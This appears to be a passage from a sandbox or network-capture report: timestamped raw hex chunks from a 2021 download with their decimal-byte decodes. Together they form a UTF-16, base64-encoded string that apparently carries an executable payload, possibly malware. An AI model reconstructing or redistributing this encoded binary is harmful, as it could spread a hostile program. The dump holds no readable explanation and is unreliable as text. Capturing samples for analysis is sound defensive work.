                                                                                              2021-09-27 18:28:01 UTC4340INData Raw: 20 32 31 33 20 31 34 33 20 32 31 33 20 31 36 38 20 32 31 33 20 31 38 34 20 32 31 33 20 31 37 32 20 32 31 32 20 31 38 30 20 30 20 32 33 35 20 31 33 37 20 31 37 35 20 32 33 35 20 31 33 37 20 31 38 30 20 32 33 35 20 31 33 37 20 31 37 36 20 32 33 35 20 31 33 37 20 31 37 33 20 32 33 35 20 31 33 37 20 31 39 31 20 32 33 35 20 31 33 37 20 31 38 31 20 32 33 35 20 31 33 38 20 31 36 31 20 32 33 35 20 31 33 37 20 31 38 30 20 32 33 35 20 31 33 37 20 31 37 33 20 32 33 35 20 31 33 37 20 31 38 31 20 32 33 35 20 31 33 38 20 31 32 38 20 32 33 35 20 31 33 38 20 31 35 39 20 32 33 35 20 31 33 37 20 31 37 35 20 32 33 35 20 31 33 38 20 31 36 31 20 32 33 35 20 31 33 37 20 31 38 31 20 30 20 32 32 38 20 31 33 39 20 31 38 36 20 32 32 38 20 31 33 39 20 31 38 35 20 32 32 38 20 31 33
                                                                                              Data Ascii: 213 143 213 168 213 184 213 172 212 180 0 235 137 175 235 137 180 235 137 176 235 137 173 235 137 191 235 137 181 235 138 161 235 137 180 235 137 173 235 137 181 235 138 128 235 138 159 235 137 175 235 138 161 235 137 181 0 228 139 186 228 139 185 228 13
                                                                                              2021-09-27 18:28:01 UTC4356INData Raw: 37 37 20 32 33 35 20 31 37 34 20 31 33 30 20 32 33 35 20 31 37 33 20 31 39 31 20 32 33 35 20 31 37 34 20 31 33 30 20 32 33 35 20 31 37 34 20 31 32 39 20 32 33 35 20 31 37 33 20 31 38 38 20 32 33 35 20 31 37 34 20 31 35 35 20 32 33 35 20 31 37 34 20 31 33 30 20 32 33 35 20 31 37 33 20 31 38 38 20 30 20 32 32 38 20 31 37 37 20 31 38 36 20 32 32 38 20 31 37 38 20 31 37 37 20 32 32 38 20 31 37 37 20 31 38 36 20 32 32 38 20 31 37 38 20 31 36 36 20 32 32 38 20 31 37 37 20 31 38 35 20 32 32 38 20 31 37 38 20 31 38 34 20 32 32 38 20 31 37 38 20 31 36 37 20 32 32 38 20 31 37 38 20 31 37 30 20 32 32 38 20 31 37 37 20 31 38 32 20 32 32 38 20 31 37 38 20 31 34 35 20 32 32 38 20 31 37 38 20 31 36 39 20 32 32 38 20 31 37 37 20 31 38 34 20 32 32 38 20 31 37 38 20 31 36
                                                                                              Data Ascii: 77 235 174 130 235 173 191 235 174 130 235 174 129 235 173 188 235 174 155 235 174 130 235 173 188 0 228 177 186 228 178 177 228 177 186 228 178 166 228 177 185 228 178 184 228 178 167 228 178 170 228 177 182 228 178 145 228 178 169 228 177 184 228 178 16
                                                                                              2021-09-27 18:28:01 UTC4372INData Raw: 31 31 36 20 30 20 31 31 33 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 36 39 20 30 20 36 38 20 30 20 36 39 20 30 20 39 37 20 30 20 37 35 20 30 20 36 36 20 30 20 36 38 20 30 20 35 34 20 30 20 36 39 20 30 20 31 31 39 20 30 20 37 32 20 30 20 38 38 20 30 20 38 34 20 30 20 38 38 20 30 20 31 31 35 20 30 20 31 31 30 20 30 20 36 38 20 30 20 38 36 20 30 20 38 39 20 30 20 31 31 38 20 30 20 31 31 35 20 30 20 31 30 33 20 30 20 34 33 20 30 20 31 32 30 20 30 20 39 39 20 30 20 38 36 20 30 20 35 32 20 30 20 34 39 20 30 20 37 30 20 30 20 31 31 32 20 30 20 37 39 20 30 20 31 30 35 20 30 20 31 30 31 20 30 20 37 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 35 20 30 20 38 37 20 30 20 31 30 37 20 30 20
                                                                                              Data Ascii: 116 0 113 0 69 0 65 0 65 0 73 0 80 0 69 0 68 0 69 0 97 0 75 0 66 0 68 0 54 0 69 0 119 0 72 0 88 0 84 0 88 0 115 0 110 0 68 0 86 0 89 0 118 0 115 0 103 0 43 0 120 0 99 0 86 0 52 0 49 0 70 0 112 0 79 0 105 0 101 0 79 0 103 0 65 0 65 0 106 0 85 0 87 0 107 0
                                                                                              2021-09-27 18:28:01 UTC4388INData Raw: 30 20 31 31 31 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 34 37 20 30 20 37 37 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 37 20 30 20 31 30 36 20 30 20 37 37 20 30 20 31 32 30 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 36 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 36 35 20 30 20 38 33 20 30 20 37 36 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 34 33 20 30 20 35 36 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 37 20 30 20 31 30 36 20 30 20 31 31 39 20 30 20 31 32 30 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 36 20 30 20 35
                                                                                              Data Ascii: 0 111 0 65 0 106 0 89 0 47 0 77 0 84 0 65 0 65 0 65 0 85 0 87 0 106 0 77 0 120 0 48 0 65 0 65 0 105 0 56 0 55 0 47 0 85 0 65 0 83 0 76 0 66 0 109 0 111 0 65 0 106 0 89 0 43 0 56 0 84 0 65 0 65 0 65 0 85 0 87 0 106 0 119 0 120 0 48 0 65 0 65 0 105 0 56 0 5
                                                                                              2021-09-27 18:28:01 UTC4404INData Raw: 34 39 20 30 20 37 30 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 36 39 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 36 38 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 36 37 20 30 20 37 31 20 30 20 31 31 31 20 30 20 36 36 20 30 20 34 37 20 30 20 35 31 20 30 20 38 38 20 30 20 35 36 20 30 20 38 36 20 30 20 34 37 20 30 20 35 37 20 30 20 34 39 20 30 20 35 37 20 30 20 38 30 20 30 20 34 37 20 30 20 38 37 20 30 20 35 34 20 30 20 31 31 39 20 30 20 37 33 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 36 38 20 30 20 31 31 38 20 30 20 36 38 20 30 20 35 34 20 30 20 31 32 31 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 33 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 32 20 30 20 31 32 32 20 30 20 34 37 20 30 20 31
                                                                                              Data Ascii: 49 0 70 0 80 0 57 0 49 0 69 0 80 0 57 0 49 0 68 0 80 0 57 0 49 0 67 0 71 0 111 0 66 0 47 0 51 0 88 0 56 0 86 0 47 0 57 0 49 0 57 0 80 0 47 0 87 0 54 0 119 0 73 0 122 0 119 0 68 0 118 0 68 0 54 0 121 0 68 0 47 0 100 0 83 0 68 0 47 0 100 0 82 0 122 0 47 0 1
                                                                                              2021-09-27 18:28:01 UTC4420INData Raw: 20 30 20 34 37 20 30 20 35 31 20 30 20 38 31 20 30 20 31 30 37 20 30 20 37 31 20 30 20 37 30 20 30 20 38 30 20 30 20 31 31 31 20 30 20 37 37 20 30 20 36 38 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 38 34 20 30 20 31 30 36 20 30 20 36 37 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 34 33 20 30 20 37 30 20 30 20 31 30 31 20 30 20 37 36 20 30 20 31 32 31 20 30 20 34 33 20 30 20 31 30 34 20 30 20 36 37 20 30 20 37 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 31 30 33 20 30 20 37 38 20 30 20 38 38 20 30 20 35 34 20 30 20 37 34 20 30 20 31 31 31 20 30 20 31 32 30 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 36 38 20 30 20 31 32
                                                                                              Data Ascii: 0 47 0 51 0 81 0 107 0 71 0 70 0 80 0 111 0 77 0 68 0 69 0 65 0 65 0 70 0 68 0 47 0 70 0 84 0 106 0 67 0 81 0 65 0 67 0 76 0 43 0 70 0 101 0 76 0 121 0 43 0 104 0 67 0 77 0 103 0 65 0 65 0 97 0 103 0 78 0 88 0 54 0 74 0 111 0 120 0 65 0 65 0 67 0 68 0 12
                                                                                              2021-09-27 18:28:01 UTC4436INData Raw: 30 20 34 38 20 30 20 39 39 20 30 20 38 31 20 30 20 31 30 36 20 30 20 39 38 20 30 20 31 30 31 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 35 34 20 30 20 37 34 20 30 20 35 32 20 30 20 39 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 35 20 30 20 31 32 31 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 30 20 30 20 35 33 20 30 20 39 38 20 30 20 31 30 30 20 30 20 36 35 20 30 20 31 30 39 20 30 20 37 36 20 30 20 36 36 20 30 20 35 30 20 30 20 31 31 31 20 30 20 36 36 20 30 20 31 30 35 20 30 20 35 36 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 36 35 20 30 20 38 34 20 30 20 37 34 20 30 20 31 31 39 20 30 20 34 39 20 30 20 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 36
                                                                                              Data Ascii: 0 48 0 99 0 81 0 106 0 98 0 101 0 65 0 70 0 103 0 65 0 65 0 54 0 74 0 52 0 98 0 65 0 65 0 67 0 68 0 120 0 65 0 121 0 70 0 119 0 70 0 53 0 98 0 100 0 65 0 109 0 76 0 66 0 50 0 111 0 66 0 105 0 56 0 47 0 47 0 85 0 65 0 84 0 74 0 119 0 49 0 87 0 76 0 55 0 76
                                                                                              2021-09-27 18:28:01 UTC4452INData Raw: 20 38 37 20 30 20 37 38 20 30 20 31 31 30 20 30 20 39 30 20 30 20 38 31 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 30 32 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 38 39 20 30 20 35 34 20 30 20 37 37 20 30 20 31 31 31 20 30 20 37 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 35 20 30 20 31 32 30 20 30 20 37 30 20 30 20 31 30 33 20 30 20 34 37 20 30 20 34 38 20 30 20 36 38 20 30 20 31 30 32 20 30 20 31 31 37 20 30 20 37 30 20 30 20 31 31 31 20 30 20 36 36 20 30 20 31 31 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37
                                                                                              Data Ascii: 87 0 78 0 110 0 90 0 81 0 67 0 65 0 65 0 68 0 111 0 102 0 66 0 48 0 65 0 65 0 70 0 68 0 47 0 100 0 67 0 81 0 89 0 54 0 77 0 111 0 76 0 65 0 65 0 67 0 68 0 120 0 65 0 120 0 70 0 103 0 47 0 48 0 68 0 102 0 117 0 70 0 111 0 66 0 119 0 81 0 65 0 65 0 80 0 57
                                                                                              2021-09-27 18:28:01 UTC4468INData Raw: 30 20 31 31 31 20 30 20 36 37 20 30 20 38 36 20 30 20 31 30 39 20 30 20 31 30 33 20 30 20 38 35 20 30 20 31 32 32 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 35 20 30 20 31 30 37 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 35 36 20 30 20 39 30 20 30 20 34 38 20 30 20 36 36 20 30 20 39 38 20 30 20 31 31 35 20 30 20 36 35 20 30 20 37 31 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 31 30 38 20 30 20 39 37 20 30 20 37 38 20 30 20 38 34 20 30 20 31 30 32 20 30 20 31 32 30 20 30 20 38 32 20 30 20 31 31 38 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 37 20 30 20 38 36 20 30 20 34 39 20 30 20
                                                                                              Data Ascii: 0 111 0 67 0 86 0 109 0 103 0 85 0 122 0 85 0 65 0 65 0 47 0 120 0 85 0 107 0 119 0 85 0 65 0 65 0 79 0 56 0 90 0 48 0 66 0 98 0 115 0 65 0 71 0 81 0 65 0 65 0 86 0 108 0 97 0 78 0 84 0 102 0 120 0 82 0 118 0 103 0 65 0 69 0 65 0 65 0 66 0 87 0 86 0 49 0
                                                                                              2021-09-27 18:28:01 UTC4484INData Raw: 30 20 31 30 30 20 30 20 37 34 20 30 20 34 39 20 30 20 36 38 20 30 20 38 37 20 30 20 31 30 34 20 30 20 34 38 20 30 20 31 32 32 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 34 33 20 30 20 31 30 35 20 30 20 38 38 20 30 20 38 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 37 20 30 20 38 36 20 30 20 31 30 39 20 30 20 37 38 20 30 20 31 30 34 20 30 20 38 31 20 30 20 36 38 20 30 20 34 33 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 31 20 30 20 38 36 20 30 20 34 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 38 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 32 20 30 20 31 31 31 20 30 20 37 32 20 30 20 34 33 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30
                                                                                              Data Ascii: 0 100 0 74 0 49 0 68 0 87 0 104 0 48 0 122 0 85 0 65 0 65 0 86 0 43 0 105 0 88 0 89 0 81 0 65 0 65 0 87 0 86 0 109 0 78 0 104 0 81 0 68 0 43 0 47 0 47 0 57 0 81 0 86 0 43 0 105 0 73 0 89 0 81 0 65 0 65 0 82 0 111 0 72 0 43 0 103 0 65 0 65 0 65 0 65 0 70 0
                                                                                              2021-09-27 18:28:01 UTC4500INData Raw: 30 20 38 33 20 30 20 37 36 20 30 20 37 39 20 30 20 38 34 20 30 20 31 31 36 20 30 20 35 36 20 30 20 37 34 20 30 20 36 35 20 30 20 31 32 30 20 30 20 34 38 20 30 20 36 38 20 30 20 34 38 20 30 20 39 37 20 30 20 36 38 20 30 20 31 31 39 20 30 20 38 31 20 30 20 31 30 33 20 30 20 35 35 20 30 20 35 36 20 30 20 31 31 30 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 37 20 30 20 35 36 20 30 20 36 36 20 30 20 31 30 32 20 30 20 38 38 20 30 20 31 31 35 20 30 20 37 33 20 30 20 36 39 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 35 20 30 20 36 39 20 30 20 35 36 20 30 20 37 39 20 30 20 31 31 38 20 30 20 35 30 20 30 20 38 36 20 30 20 38 39 20 30 20 31 31 38 20 30 20 31 31 35 20 30 20 31 30 33 20 30 20 31 30 31 20 30 20 31 32 30 20 30 20 37 33 20 30 20 36 35 20 30 20 31 30
                                                                                              Data Ascii: 0 83 0 76 0 79 0 84 0 116 0 56 0 74 0 65 0 120 0 48 0 68 0 48 0 97 0 68 0 119 0 81 0 103 0 55 0 56 0 110 0 122 0 119 0 77 0 56 0 66 0 102 0 88 0 115 0 73 0 69 0 65 0 73 0 115 0 69 0 56 0 79 0 118 0 50 0 86 0 89 0 118 0 115 0 103 0 101 0 120 0 73 0 65 0 10
                                                                                              2021-09-27 18:28:01 UTC4516INData Raw: 20 36 35 20 30 20 38 37 20 30 20 38 36 20 30 20 37 39 20 30 20 34 37 20 30 20 36 37 20 30 20 38 37 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 30 20 30 20 38 34 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 38 31 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 34 37 20 30 20 35 37 20 30 20 38 39 20 30 20 35 35 20 30 20 31 31 39 20 30 20 35 32 20 30 20 31 30 38 20 30 20 37 30 20 30 20 36 38 20 30 20 37 32 20 30 20 38 35 20 30 20 38 35 20 30 20 38 35 20 30 20 34 39 20 30 20 31 30 32 20 30 20 34 37 20 30 20 37 30 20 30 20 38 35 20 30 20 31 30 36 20 30 20 36 37 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 31 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 38 31 20 30 20 34 37 20 30
                                                                                              Data Ascii: 65 0 87 0 86 0 79 0 47 0 67 0 87 0 74 0 65 0 65 0 70 0 100 0 84 0 47 0 51 0 85 0 81 0 47 0 51 0 85 0 73 0 47 0 57 0 89 0 55 0 119 0 52 0 108 0 70 0 68 0 72 0 85 0 85 0 85 0 49 0 102 0 47 0 70 0 85 0 106 0 67 0 81 0 65 0 66 0 81 0 47 0 51 0 85 0 81 0 47 0
                                                                                              2021-09-27 18:28:01 UTC4532INData Raw: 20 30 20 31 30 35 20 30 20 34 33 20 30 20 31 31 39 20 30 20 31 32 32 20 30 20 31 32 31 20 30 20 38 34 20 30 20 31 30 38 20 30 20 37 38 20 30 20 36 38 20 30 20 37 30 20 30 20 37 39 20 30 20 37 36 20 30 20 35 30 20 30 20 37 32 20 30 20 38 32 20 30 20 36 36 20 30 20 31 30 35 20 30 20 35 32 20 30 20 38 39 20 30 20 31 31 35 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 35 36 20 30 20 37 30 20 30 20 34 33 20 30 20 37 31 20 30 20 31 31 31 20 30 20 35 30 20 30 20 37 37 20 30 20 31 30 34 20 30 20 31 31 37 20 30 20 31 30 33 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 36 39 20 30 20 38 34 20 30 20 38 30 20 30 20 38 34 20 30 20 39 30 20 30 20 31 31 38 20 30 20 31 30 32 20 30 20 36 37 20
                                                                                              Data Ascii: 0 105 0 43 0 119 0 122 0 121 0 84 0 108 0 78 0 68 0 70 0 79 0 76 0 50 0 72 0 82 0 66 0 105 0 52 0 89 0 115 0 65 0 119 0 65 0 65 0 79 0 56 0 70 0 43 0 71 0 111 0 50 0 77 0 104 0 117 0 103 0 67 0 65 0 65 0 67 0 76 0 69 0 84 0 80 0 84 0 90 0 118 0 102 0 67
                                                                                              2021-09-27 18:28:01 UTC4548INData Raw: 35 32 20 30 20 31 31 35 20 30 20 31 30 32 20 30 20 37 36 20 30 20 31 31 36 20 30 20 31 31 31 20 30 20 35 35 20 30 20 37 37 20 30 20 38 32 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 38 20 30 20 37 34 20 30 20 36 35 20 30 20 31 32 31 20 30 20 37 36 20 30 20 31 32 30 20 30 20 31 31 37 20 30 20 31 30 34 20 30 20 38 36 20 30 20 34 37 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 38 38 20 30 20 35 36 20 30 20 37 33 20 30 20 36 39 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 33 20 30 20 37 32 20 30 20 31 31 35 20 30 20 36 36 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 37 20 30 20 37 31 20 30 20 34 39 20 30 20 36 35 20 30 20 37 33 20 30
                                                                                              Data Ascii: 52 0 115 0 102 0 76 0 116 0 111 0 55 0 77 0 82 0 65 0 65 0 80 0 57 0 48 0 74 0 65 0 121 0 76 0 120 0 117 0 104 0 86 0 47 0 118 0 47 0 47 0 88 0 56 0 73 0 69 0 65 0 70 0 87 0 76 0 55 0 73 0 72 0 115 0 66 0 65 0 73 0 65 0 65 0 73 0 117 0 71 0 49 0 65 0 73 0
                                                                                              2021-09-27 18:28:01 UTC4564INData Raw: 30 20 38 35 20 30 20 37 39 20 30 20 31 30 36 20 30 20 31 30 36 20 30 20 37 37 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 31 20 30 20 38 31 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 35 20 30 20 36 35 20 30 20 34 37 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 36 37 20 30 20 37 33 20 30 20 31 31 38 20 30 20 37 32 20 30 20 35 34 20 30 20 36 37 20 30 20 39 38 20 30 20 34 39 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 31 30 32 20 30 20 38 38 20 30 20 31 30 38 20 30 20 31 31 38 20 30 20 37 34 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 38 31 20 30 20 36 35 20 30 20 38 36 20 30 20 38 39 20 30 20 31 31 38 20 30 20 31 31 35 20 30 20
                                                                                              Data Ascii: 0 85 0 79 0 106 0 106 0 77 0 119 0 65 0 65 0 103 0 56 0 81 0 81 0 106 0 89 0 85 0 65 0 47 0 80 0 47 0 47 0 85 0 80 0 57 0 49 0 67 0 73 0 118 0 72 0 54 0 67 0 98 0 49 0 47 0 47 0 57 0 102 0 88 0 108 0 118 0 74 0 119 0 103 0 81 0 65 0 86 0 89 0 118 0 115 0
                                                                                              2021-09-27 18:28:01 UTC4580INData Raw: 30 20 37 38 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 31 30 33 20 30 20 35 34 20 30 20 36 37 20 30 20 31 30 32 20 30 20 38 32 20 30 20 34 37 20 30 20 34 37 20 30 20 35 36 20 30 20 35 35 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 34 33 20 30 20 37 37 20 30 20 35 33 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 35 20 30 20 37 38 20 30 20 31 30 30 20 30 20 38 30 20 30 20 31 31 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 36 20 30 20 35 32 20 30 20 36 39 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 39 39 20 30 20 36 39 20 30 20 36 39 20 30 20 38 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 31 30 38 20 30 20 37 31 20 30 20 37 38
                                                                                              Data Ascii: 0 78 0 100 0 67 0 81 0 103 0 54 0 67 0 102 0 82 0 47 0 47 0 56 0 55 0 119 0 119 0 43 0 77 0 53 0 103 0 65 0 65 0 65 0 73 0 115 0 78 0 100 0 80 0 112 0 65 0 65 0 76 0 52 0 69 0 65 0 81 0 65 0 65 0 103 0 99 0 69 0 69 0 86 0 81 0 65 0 65 0 86 0 108 0 71 0 78
                                                                                              2021-09-27 18:28:01 UTC4596INData Raw: 20 31 30 32 20 30 20 31 32 31 20 30 20 37 36 20 30 20 35 36 20 30 20 38 30 20 30 20 35 36 20 30 20 38 36 20 30 20 31 30 38 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 34 33 20 30 20 37 36 20 30 20 31 32 30 20 30 20 31 30 38 20 30 20 31 31 36 20 30 20 31 30 31 20 30 20 31 32 31 20 30 20 39 39 20 30 20 37 33 20 30 20 36 39 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 30 20 30 20 39 30 20 30 20 38 38 20 30 20 31 30 35 20 30 20 34 37 20 30 20 36 35 20 30 20 31 32 32 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 36 20 30 20 35 31 20 30 20 34 37 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 34 20 30 20 39 39 20 30 20 36 36 20 30 20 34 38 20 30 20 37 35 20 30 20 37
                                                                                              Data Ascii: 102 0 121 0 76 0 56 0 80 0 56 0 86 0 108 0 77 0 66 0 65 0 65 0 70 0 43 0 76 0 120 0 108 0 116 0 101 0 121 0 99 0 73 0 69 0 65 0 70 0 87 0 76 0 55 0 70 0 90 0 88 0 105 0 47 0 65 0 122 0 47 0 43 0 106 0 51 0 47 0 118 0 47 0 47 0 104 0 99 0 66 0 48 0 75 0 7
                                                                                              2021-09-27 18:28:01 UTC4612INData Raw: 37 39 20 30 20 31 30 36 20 30 20 34 37 20 30 20 31 31 39 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 38 20 30 20 31 30 30 20 30 20 31 31 39 20 30 20 38 32 20 30 20 38 37 20 30 20 35 34 20 30 20 37 38 20 30 20 39 39 20 30 20 38 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 30 20 30 20 31 30 38 20 30 20 39 30 20 30 20 31 30 30 20 30 20 36 37 20 30 20 31 31 30 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 35 20 30 20 37 36 20 30 20 31 32 32 20 30 20 31 31 37 20 30 20 31 30 35 20 30 20 37 38 20 30 20 31 31 35 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20
                                                                                              Data Ascii: 79 0 106 0 47 0 119 0 80 0 47 0 47 0 47 0 51 0 85 0 73 0 105 0 47 0 105 0 78 0 100 0 119 0 82 0 87 0 54 0 78 0 99 0 89 0 65 0 65 0 67 0 70 0 119 0 70 0 108 0 90 0 100 0 67 0 110 0 47 0 100 0 81 0 105 0 76 0 122 0 117 0 105 0 78 0 115 0 102 0 47 0 47 0 85
                                                                                              2021-09-27 18:28:01 UTC4628INData Raw: 30 20 34 33 20 30 20 37 33 20 30 20 34 39 20 30 20 35 37 20 30 20 34 37 20 30 20 37 35 20 30 20 31 31 37 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 32 20 30 20 31 30 35 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 31 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 30 20 30 20 36 37 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 32 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 30 20 30 20 38 32 20 30 20 38 31 20 30 20 38 35 20 30 20 31 30 38 20 30 20 37 34 20 30 20 38 33 20 30 20 39 37 20 30 20 31 30 33 20 30 20 37 32 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 32 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 38 32 20 30 20 38 34 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 32 32 20 30 20 37 32 20 30 20 38
                                                                                              Data Ascii: 0 43 0 73 0 49 0 57 0 47 0 75 0 117 0 78 0 82 0 102 0 105 0 74 0 82 0 101 0 67 0 78 0 82 0 100 0 67 0 74 0 82 0 102 0 67 0 78 0 82 0 100 0 82 0 81 0 85 0 108 0 74 0 83 0 97 0 103 0 72 0 47 0 100 0 82 0 67 0 78 0 82 0 82 0 84 0 47 0 100 0 81 0 122 0 72 0 8
                                                                                              2021-09-27 18:28:01 UTC4644INData Raw: 30 20 34 37 20 30 20 34 39 20 30 20 31 30 30 20 30 20 38 38 20 30 20 38 35 20 30 20 34 39 20 30 20 37 38 20 30 20 31 31 33 20 30 20 36 35 20 30 20 31 31 38 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 33 20 30 20 31 31 38 20 30 20 37 31 20 30 20 35 34 20 30 20 36 37 20 30 20 31 30 31 20 30 20 36 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 32 20 30 20 31 32 32 20 30 20 34 37 20 30 20 37 30 20 30 20 38 31 20 30 20 36 38 20 30 20 36 37 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 34 20 30 20 38 36 20 30 20 31 31 38 20 30 20 35 37 20 30 20 35 30 20 30 20 36 39 20 30 20 38 30 20 30 20 35 36 20 30 20 38 36 20 30 20 35 31 20 30 20 37 37 20 30 20 37 30 20 30 20 36 35 20 30 20 36 35 20 30
                                                                                              Data Ascii: 0 47 0 49 0 100 0 88 0 85 0 49 0 78 0 113 0 65 0 118 0 57 0 49 0 47 0 73 0 118 0 71 0 54 0 67 0 101 0 67 0 47 0 47 0 47 0 47 0 100 0 102 0 122 0 47 0 70 0 81 0 68 0 67 0 81 0 65 0 66 0 84 0 86 0 118 0 57 0 50 0 69 0 80 0 56 0 86 0 51 0 77 0 70 0 65 0 65 0
